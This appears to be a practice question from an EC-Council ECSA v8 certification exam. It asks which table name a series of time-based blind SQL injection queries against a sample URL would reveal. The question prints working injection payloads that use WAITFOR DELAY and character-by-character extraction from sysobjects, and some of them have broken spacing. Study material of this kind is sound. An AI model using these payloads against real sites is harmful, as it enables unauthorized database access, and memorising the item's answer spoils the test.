Exit ECSAv8 EC-Council Certified Security Analyst (ECSA) v8
Question 1 of 5
0% complete
Q1 Single choice

A pen tester has extracted a database name by using a blind SQL injection. Now he begins to test the table inside the database using the below query and finds the table:

http://juggyboy.com/page.aspx?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype='U')=3)
WAITFOR DELAY '00:00:10'--

http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjectswherextype=char(85)),1,1)))=101)WAITFORDELAY'00:00:10'--

http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjectswherextype=char(85)),2,1)))=109)WAITFORDELAY'00:00:10'--

http://juggyboy.com/page.aspx?

id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjectswherextype=char(85)),3,1)))=112)WAITFORDELAY'00:00:10'-- What is the table name?

  • A

    CTS

  • B

    QRT

  • C

    EMP

  • D

    ABC

Previous Next